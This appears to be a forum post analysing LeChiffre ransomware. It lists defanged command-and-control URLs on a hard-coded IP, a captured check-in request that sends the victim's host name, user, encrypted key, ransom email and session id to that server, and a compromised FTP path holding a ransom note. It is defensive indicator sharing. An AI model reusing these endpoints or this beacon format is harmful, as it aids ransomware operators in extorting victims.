I'm seeing a bunch of hard coded control server paths:
hxtp://184.107.251.146/sipvoice.php?changecomment=&comment=
hxtp://184.107.251.146/sipvoice.php?insert=&servername=
hxtp://184.107.251.146/sipvoice.php?shutdown=&reason=
hxtp://184.107.251.146/sipvoice.php?update=&finished=
hxtp://184.107.251.146/sipvoice.php?updqua=&quantity=
Network:
GET /sipvoice.php?insert=&servername=Sandbox&username=Administrator&started=25.01.16 10:41&secretcode=b8rEq0zv69Tov31yu40fzcmkPS0/Jy7RJYnM1SQoPJzJKTJyGu9eDBckvcS3baP2qRd0BDAy0k/vGuwhsl34GFSg2o/q1dWzQcmHBCYBUWKR4A5zBBtJti1VQDxJbBn9c46H/xgSHevRay8Z3imFp7rZdRbqDDrWNvH7UvX/fijK2HEpHD2cMlyjWZN5uCXphfiUm+UF5CCfwYF7g6Ll2zDc3snOYGy6VTacIzJVC+4BM5zCeTQKlbRmj9jXlnom&email=
decrypt.my.files@gmail.com&session=rihsdhieLENrlXaRYaqojfDpyTKFpnFE&patched=0 HTTP/1.0
Host: 184.107.251.146
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
/sipvoice.php?
insert=
servername=Sandbox
username=Administrator
started=25.01.16 10:41
secretcode=b8rEq0zv69Tov31yu40fzcmkPS0/Jy7RJYnM1SQoPJzJKTJyGu9eDBckvcS3baP2qRd0BDAy0k/vGuwhsl34GFSg2o/q1dWzQcmHBCYBUWKR4A5zBBtJti1VQDxJbBn9c46H/xgSHevRay8Z3imFp7rZdRbqDDrWNvH7UvX/fijK2HEpHD2cMlyjWZN5uCXphfiUm+UF5CCfwYF7g6Ll2zDc3snOYGy6VTacIzJVC+4BM5zCeTQKlbRmj9jXlnom
email=
decrypt.my.files@gmail.com
session=rihsdhieLENrlXaRYaqojfDpyTKFpnFE
patched=0
--------------------------
Also looks like the following was pwned:
Code: Select allftp://200.27.90.24/_help%20to%20decrypt%20LeChiffre%20for%20[RESPALDO]%20l.html
